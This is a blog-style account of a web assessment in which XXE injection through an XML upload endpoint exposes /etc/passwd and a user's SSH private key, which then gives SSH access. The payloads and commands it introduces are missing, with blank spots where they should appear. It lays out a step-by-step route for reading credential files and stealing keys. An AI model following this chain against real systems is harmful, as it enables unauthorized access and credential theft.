Exploiting XML Injection to Establish Unauthorized SSH Connection

Today, I’m thrilled to share my discovery of a critical vulnerability within a web application that ultimately led to unauthorized SSH connection. While conducting a routine assessment using Burp Suite, I stumbled upon file upload endpoints. To gauge the application’s security, I experimented with various file types and was surprised to find that it accepted XML files.

Understanding the potential risks associated with XML uploads, I set out to exploit this newfound capability. Crafting a specially designed XML payload, I aimed to leverage an XML External Entity (XXE) injection.

The payload I used resembled the following:

This payload effectively requested the /etc/passwd file from the server, leading to a successful Local File Inclusion (LFI) vulnerability. With this access, I could peruse sensitive system files, with limited privileges.

Eager to escalate my privileges further, I attempted to access the /etc/shadow file, hoping to extract encrypted passwords. Unfortunately, my lack of root privileges prevented me from accessing this critical file. However, during my exploration, I discovered a user account lets say named 'Alice,' which I had permission to access.

Capitalizing on this opportunity, I attempted to retrieve Alice’s SSH private key, which could potentially grant me unauthorized access to the system. Employing a similar XML payload, I targeted the SSH key file located at /home/users/alice/.ssh/id_rsa.

To my delight, the payload successfully retrieved Alice’s SSH private key. With this crucial piece of information in hand, I proceeded to identify the IP address of the target server using a simple ping command:

Subsequently, I conducted an Nmap scan to ascertain if port 22, the SSH port, was open:

The scan confirmed that port 22 was indeed open, paving the way for me to access the server as Alice. This newfound access granted me significant leverage within the system, underscoring the severity of the initial XML injection vulnerability.

In conclusion, the discovery of an XML injection vulnerability within the web application underscores the critical importance of robust security measures. By following best practices such as input validation, secure parsing, and regular security audits, organizations can effectively mitigate the risk of XML injection and other similar vulnerabilities. Remember, proactive security measures are essential to safeguarding sensitive data and maintaining the integrity of web applications in today's ever-evolving threat landscape. Stay vigilant, stay secure.